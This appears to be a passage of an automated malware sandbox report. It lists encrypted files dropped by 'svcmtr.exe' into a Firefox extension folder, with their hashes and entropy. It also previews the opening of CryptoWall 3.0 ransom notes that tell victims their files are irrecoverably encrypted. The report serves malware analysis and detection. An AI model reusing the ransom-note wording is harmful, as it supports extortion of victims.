                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2WxX5/T/DJs9kNo31rC97ObfchOofbcAuMQQGfx2dyfUA9J:c+9U40oDg9X1T/DJsyc+OwEWJRtwsdi7
                                                                                                                          MD5:438AC1B0C5AE02C847E187894FB92FA2
                                                                                                                          SHA1:8398861B7E137FBD65C8002E25AE8D4FBCC4AA32
                                                                                                                          SHA-256:7317593F09823A8F8A183E38DBA7A90FA3D01340C4FE52D50FF47100FAB36982
                                                                                                                          SHA-512:DB3C6BA861C4BA76D33DC932AB000BCD7F33509EE9A7104558EDBE9953B3C707010AA00696B70195705B0292426B6C840E0788653191EDE03C7645D1C6B9FBEF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..Y.r*....YD...G....K.y(... .....D...".?.?.U=In.FA.....:SI.....7..n.......n....X-;f..LH.\...R.2g...K..g...:...[0s.nr...X{1?o..0.U.Y.....*.P.....*..H..._....w..{.h...\yB~5.B.....jb~?.#H=....k.8=.".l.*R.......K..\..\.>N...q....N..KVB....:.Q..7,.........o.r......^1...=~...":tiO......#.%H.......O.L.P.2.,.....fZ7......s>nE9.-tn.2..k......a.Wg"A?.]p.........TI......]!B..ft.....&~....{h..%.<5........cE...!....uS.?.K4. ..F...G-.)..9 .d).......`.....V}.=....K..:.....)v.....c.T..].\...W.Y...........F0mE@.......s...X.S..G..)o.?.s.YQ.......B.|.w...M..U..R{..]f3..~...1..)....y.Lz0n.rl...

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-32.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1902
                                                                                                                          Entropy (8bit):7.762082222377723
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg5Y96OL6bxq3aLQGVnkhkqKKDBl1ZSXbAN:cztoD39L6MaQynkhkIBl1ELO
                                                                                                                          MD5:FA5027966A03F348427D6993DB4B60B5
                                                                                                                          SHA1:C8B109F7048DF8442108676E940D2A22DA726030
                                                                                                                          SHA-256:039770AC0678E7D893CFE523CBA009AEEFE5943A1D2ED44B0650445C8D0CC996
                                                                                                                          SHA-512:7D51C6F26F417956DBE5F0E448E07EF81D73DC641143C971FAB32FE981ACB1375F92FE0B977BD237C2A5245A163B9AFDA016246E92C0E31DA43DC7270AE5BDD1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......yM......-.........{.A{ .3.TZ..kD..N..n...H$.$...+B...3..nu.u.>.r#...\..v)p..U......Z(gE,...G..;.wz~..;.`.Q..a..O.....i..,T.m..~.....v...s...*._(....}..m./...........h.........5..=...A....~....@...-..........%z.M..'.<r.l6..@z.M.L{55....P.p..Q...Q...s.....J5|}...kQ....|..~H...AK6.....i..p;........c.+../..i.n..}t..h.+..w..m...Xa..K...a...J...`.{K>... ...E|6/\!..n:...x..2.r...G...(9.&......]_.8.".f....J{..G.ZL...#...A>.|.p.NS*-l.JEU...A.......t.....8W.C.S...S...(..Y.BE@.....'a..'.W&.......!t.EC3..@..v8.>u.Plh.a.K.T........C...p$.=.=.w...."+.\.g...^.nBC.e...YI}..cB.....

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-32_active.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1870
                                                                                                                          Entropy (8bit):7.756211554675807
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg5o0nkE15SXcoCvvmBKMuN+qkf1CdeQK/qppKr7iy:cztoDcGErSXuvS8N+Ff1C0SKOy
                                                                                                                          MD5:C928067616207C9C9A489BB971559C28
                                                                                                                          SHA1:6212693065F64D854E7177BBED93B13FE7E5FE39
                                                                                                                          SHA-256:6C99EB3FD60C8335E6E96C3BAFF731300597DD6497855D687201CE23E7391126
                                                                                                                          SHA-512:14A00C1558773DA6CA323A86CFBB895653299DFE04AB10E68C97B9555BDF7E3CBAC05EBCD74CE0336ACE5B3D008665C7B253F0472EB0A36D328D13D055DE2DB0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......xiZISG.x...u.....8.(.Y.P=.N.5\..?..7"......K.6..Q...=..+I.8+....\RU..mVF.....d.n.PGt.j.g......u/._cV...[Y..28,...J......R.(7@....|VN.D..O:A..G.h.S..8.1........~S..<.rO.?..!..!..+...r.O...-..5$....q.../.g..Y..Q......LL...O[So.M....).......k.-..Y.U@.w...E...U....2D%.Y...a.....~S...C...bgOj...|R...w|]U...I..-B{...3.pP.0.^..U...4...`L.ze. lGmW....G.B.......c[.....rp..........d..k..u..U.5.+*...80.|}OR,....KO~s?..M.....Y._;...k.q...B.E..m...b..]$L..Q.?w.~..9W..E,........,.m.L.$y..4.C...'i..',.R.|.x.=SE..L.....Sl....%.D..@...@+E.&^~@E1} ....`...+..l^..;...LH...@.q...b.C`

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-64.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2446
                                                                                                                          Entropy (8bit):7.8246035609718
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgZfFnM8IpTeH9OkZEGf3tcnK8fJDBSIsU6sjx8NApe:cztoDq1M8GY1ZRZYDBSIs1sOK8
                                                                                                                          MD5:EAB0670927FCD5F822B21D8E09AB039B
                                                                                                                          SHA1:4B96AFCF87DC50901A57853B5822B9187CE8F600
                                                                                                                          SHA-256:4210D1C4F62662725D25D9FEA37140AEFA2EE6849B4D2A5C4E04192FE45AE19B
                                                                                                                          SHA-512:9772618503549A98D51002A6E3C3B91F7C0969B929A51606EB05A2C11402096B06D10123315EC4F09698F57F1D22894F089F0FE607D5D2F61F929B240D360AF4
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...4......'...5.......<...<.:."..o...n.."..c?...g..\..6G.R.J}Z.5....:...9.A..o..x.^#3....Et...py......E.|....w=F.(.G.h.>.rw..iH.&o^.#.Iyf_.....F..<W8...8Z.P........h.:e/.....U.R..."....<.~..H......i{.7.I..q..)(k.[.elW..*..E...v..J|..aQ..P..,.........R.+.,.F....7Y?.K9!..i.g"..N..R...g...e.0V..|\"8...r.J..t.Ggd.....N.I)sCw...\.......^/.0.V..,.Tw-Iv.\..s..../k......lm.gLL..E5...W..d&....+.T......3.<...+..D..........@:.i...;...C..V.X.-1.j.e...-.~V.Lu.....uw.....f..e.!.6t.w+..:..WC.L..0..."AQ...l...h.DG..n.T.......F.......L.<.<S$..........8.R.1.W*_.....E.g.r....t..c..BUS

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-64_active.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2382
                                                                                                                          Entropy (8bit):7.824190227074992
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgjKxnu9Wwk6dfGoOxDCDRpqp1gUZzpZb3UIY1m63W8:cztoDhFwlFOG+pNzv3a1HG8
                                                                                                                          MD5:004373613EFF96FBC1713A9A3DDA33A3
                                                                                                                          SHA1:138E6AA14A75B339D826EE366E13576EDF556810
                                                                                                                          SHA-256:629A1AA60ACF65814085C430132EB59F508E2412BFB523FEA2DAC15E57C14262
                                                                                                                          SHA-512:355698BC33EEFBAC55B0D76DF534F70940EC7BC167BA40B57B387C1DA8DBA5F1F56B2F199BC85EEEBF8A515431494F49F7917278237CEEE01F0DE3335A27B415
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....N~..;N.4.}........d.l...5F..>m..{....w.(...k..A/.....r.....l.......q..4...u}Cc.'.b....2.u.[.i5.....g...qi..J...Ic@.d......H:*.f....H.!.U.a....X2..I.yk.u..<.p........... ..5q.r.w.G...w1...A.P..3.....Ql}...|R...Z....s..ef..Z..?..-...Jw....y."h....e..z..........}. ..Ku.x.....J..U.ri..276.........q..3..lP)........ER..SQ.yX._..#.c.Q.F\k......M...)z>.......~..!.\.......).\.n...dn........|.*...w.C.?...P+...gq.%f./t.FG...Z&9A.=(P..!.......RG.4.......c]:z_.C0Y.%.-f...i{`-$X.`W...)....N./..k.....b.P%..[..S.HN.-.O#..% .0...f3".4..7x........\..P..k.W#..`ax.S#$..H.x...d.$'.<..6.n...pkx.

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\notification-icon.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1822
                                                                                                                          Entropy (8bit):7.754150731458982
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg73g1u6CYvwaRLbIOZOhxWd1y7iuEiUI:cztoDM3g12gFbImSgd17bI
                                                                                                                          MD5:EFAE0683B6F5A11BDDB2B11A6C05146B
                                                                                                                          SHA1:7A5E74032B09548C8E75D80C672F3CBF1FB7F5E5
                                                                                                                          SHA-256:D7AC49D1902A7C3480DD144B65250FAFCFE4EEAAEA6BF88CE0D6F919C3B617B2
                                                                                                                          SHA-512:30D87D2A0A2C08E4F9677963BCB538602AE3891902893A94B08873C470C2A29E0E2D5E5C3C9371D05281F10C218E744EAA50A8BB6B4B83DFF94EE53FDD97D882
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....6&..e.J...1>.w....3.'..n..4..=.....m.*W......DP;....)sY.....Q._....W.:..[..i.&K..."+L.-...NA_......UN.^.B.xI*C.Q..It..k/..U74Y...f9......2..j..&.rt.....M.H.{...u...:..[+/xb?@..Ma..F!L....x......].(.o2.0.~..b.....|..B. ...G.......r..\.{!J..kxBF.R.u.T.$l...(J...F..1.....B...a...)......6....~.R...d....OZ.k}.r....Q../jvF......|..K...[H.8...~.}&.2p.$O.m1..W7...`.".(~.\.yB.....U..T.....j....r)....Yg....U..N@XD.>L...g.../,+(.........../g....VJ.Q. ~.f...4..{Y.m.+h.. @..L<\.B.U .W.2....c.B...mS.JT.7[IR].&....)y.../EOjK.hb..@5"..].V8..u..r.5.A......M.+...h...m....r.<..\.K.F..U...\

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\star1.svg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1182
                                                                                                                          Entropy (8bit):7.547721194304397
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2JMwwRCi47yXNKu+NGBaq4JJ5pTwVN/c+:c+9U40oDgwMRR31XNxIGBloJX8k+
                                                                                                                          MD5:23EDF58672017B7B9688D4D23289351A
                                                                                                                          SHA1:0C0DED5FE88526EAA7D8F2DE0DA50DAED02075EC
                                                                                                                          SHA-256:D659AA9BF54612D79168F4F0C28D10BD81869017608773292A632A681A82ABB4
                                                                                                                          SHA-512:4165FBE66C3D02467B6A139E5D700801977924BA58D549E3F8642B0EED22FC5BF6D4C3C44181F168C374613E18C4A01B78C0C67EF7446DB2A65008E66DEDF925
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..*5U.\\......EO.S.....0.g.....n=.!..X..2.Z...u..m......S9.....Y.7"....+....D..V...#..c.@Zn..D..%Gr;. V`...m..C..{...Z......+$]....7.9.I......~P#.Y...G...D.0...-.....^@..L.3S?1..W.p.F..........I.3.,....Zq....)........b.-.jW..}..E..l... ..m...{..u.J..[d..8........j.FFUC.a(.>.k{.G.../...#..(.:..P..'..%.v;8.U.9..6 ..@.v."v...zM.9..-*y..|..ya8&......XRT.Q..Qc%.1.}zPQ9.U.e.../.X^. ..a.`...2w.X..Dr..A.U...N..K..h.....1...e..&.G.i....{PB..3)..N-I.1...`[.L>...cg.'....f'^.j....E......5..|.....'a...q.~acp.t|.(.......+.U..zE.....@a..OR...........^..B..I5b.....u..X..%/....z%p. ...

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\star2.svg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1566
                                                                                                                          Entropy (8bit):7.6972077428042915
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgrp46tjKirvCUSX6y+fkGbSXRPRtzyE:cztoDwu6llCV6CbVRZz
                                                                                                                          MD5:605B29A01C5145D64487F502D7925CCF
                                                                                                                          SHA1:07E09624840A1207DA532E9C4A949B08DCC39955
                                                                                                                          SHA-256:CB3F906B0234F1FBA4FC84F2A8DAC6D418452D440C27C22692E228A46B4AC344
                                                                                                                          SHA-512:6F5711AD7DD7F93E3EE6CE39229EB2863B5ACE75542C607819DD35C78F997D4F12AE846202FFE1F436079B01F862416174F7351CCC99734EEEDA7718554FD018
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...z.C...0:_...g>~p...q..E/q_C...I.k...Lu..6w3.8.V~h.^>1'n\...R.z,..l...r......(P.y......3....,.."j}..ZHs.....$fZ.j1.Q...OQs......Q.....I{(..i.U........@ ...,H\...O=wJ..K'...3D.w........p}t...+.....Cx&x.5.N..K.8.M0'BX..#..UQF_.V...'...,..5.......G..u.&......t..h}Dn..*..2...~b...@...?...O..w.."....WF..-./T%R.Y)..So...M...=..W.....p.s......au.e..A.S.Z.y.x(.5.M........m.../L...J..7..B.w.y.....Y.....o2&.......3 H.h./H.x.....>..VY..P]>"oY.H~5.|.8,....a....Hf...)...3zI........:.=...aD.y.s...g..9.I!.>.z..?.&..a.N{.....a..+.._.p.9...u......-~...#...l...ff.]>".....x?...V.{...rd.}.

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\star3.svg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1694
                                                                                                                          Entropy (8bit):7.703343097095299
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2cpO7qHyH4fYD7AuuTFEQOzYRgAhsFRvGaJO2n38E:c+9U40oDgfpsFuYD76mBmRgr3p
                                                                                                                          MD5:4A4514FB43670EE7C66ED40411DEC5A0
                                                                                                                          SHA1:12D1FE3EFEE19BF6765C0302124DDBABA1D22E47
                                                                                                                          SHA-256:2535E4F9A1DBEC5E209A3018F5496FC175D5E0DC0E69FE2E38979B4F9448C738
                                                                                                                          SHA-512:F69BC749CD8E72829E54B4D353B2AFD5D36BBCFA79A7ADD3E171C0C0B4EA2F7BACA0D2B3BE707BE782C43485F3CD5B06DBA997038A2EBE27AB335948298AD772
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..9..x.....Y.[.q.u.......B...3..?Z....W.r. .!_.!.....-..s... ..Lw.....o..P...K..|H.e..'"7NSK...U....o!A....R...X........fX...y. .....v(.)..gh.h...=.].R..}Eux.M....cH.QB.D..}<..z.....q....u...Q.$|.LS..!.k.<qT!..\..Mv...y..Z...w.."f_K.z.e......h.....!........o..a.s.8.._.z..c........cXl..}'.........kv.tw.m.tX.........O.)0>.Wd.......\..t.q.4....ds..w>..6.3U.>.......t.Z.Sc...U(A....y8....X......'UHX|.3.....U....N.eN.~k.1$...[.p.....<.M5g.`..[l)...q8K5}. b.*.UD.}.......UNG.b.]U..v............\B..<bC.U.= ...=H2...[/t},...}*.*..r^.`V.W2.....t{.uyL#.v..%N0...BD...>DUE.a.S7.uK'.u6..x

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\star4.svg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1278
                                                                                                                          Entropy (8bit):7.569370571349907
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S27VEBOIR2vGfpS/kWfgf012faOQrz3Uzf:c+9U40oDgpoxGxAk4gsPOqzEr
                                                                                                                          MD5:6EBFE340CAEFE01CAB6CEDE6A9286839
                                                                                                                          SHA1:D773F857E48D922F083BB7C8ABFEF7175138BE6D
                                                                                                                          SHA-256:4CEC4A1B91E72098C50CE37989C97D9EEC3C7E83E3BF797168421AE053465361
                                                                                                                          SHA-512:49DBE6E0846CCB7779E7E9827D12691E014885A44BE7A94AC0622704A1CED9A4F0BE49719E5614D1BD1B828DBF96FF3FF6E87E7FB2C74F77AD6B23E561A60C21
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....._.......)*).U...A...........#.xE3.....~.f...(..U~a|..aZ?W.DZ....0...S..C.~...F.....}..m...F.g.....:QF...mlV..E.c.G..,.-5.......9.~..x''n.XAjiP....?f~...?.`...O..j..m...(T..x..{..-<.M[D......_.=..q_5G....7....r @a.....f...^=..a8.a....&...U^QR....p.....*.5R.N(.f..rUG0.h._)...W.=..C.\...y...,...N..k.P ...e.....e#.V.s.3Q.M.$AN.0s.{j.:....Z...Q.G..-..x.A.8Dm.Z.7n.p.].|}2Z0.......Iy....:l.s..)..|./........".........v...g.:(..n!.....K.A6X...I.r.&.(....).JE..'.....*...!.I...hB}$.-JC1.l'..2..=..1.t.......S.....F....f.....8...o.S.L..j...T..ngP.OE..@w......![..t.W.Y..J..$..

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\star_active.svg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1054
                                                                                                                          Entropy (8bit):7.445607031987796
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2GkrRulvSnb8QPB0VAz1Hqb4:c+9U40oDguRulvmJd
                                                                                                                          MD5:999FA04F770523B19591F15B3F23D52D
                                                                                                                          SHA1:E8E430EDB732E797EC1916E3A8FDDA940E6D6221
                                                                                                                          SHA-256:7DEF86268FF42AE79AB2D667CAE13A53B5B7D1909C6FAC20DC8D88D2C6820E48
                                                                                                                          SHA-512:2F439D3DE923311B16874FD6CC208A4445015921366E65685163C282F50AD15015F6E450FE1DF6F18AC23F1FB5BE2CBBBC06CE9BC0EC6102FA562826BAF6017C
                                                                                                                          Malicious:false
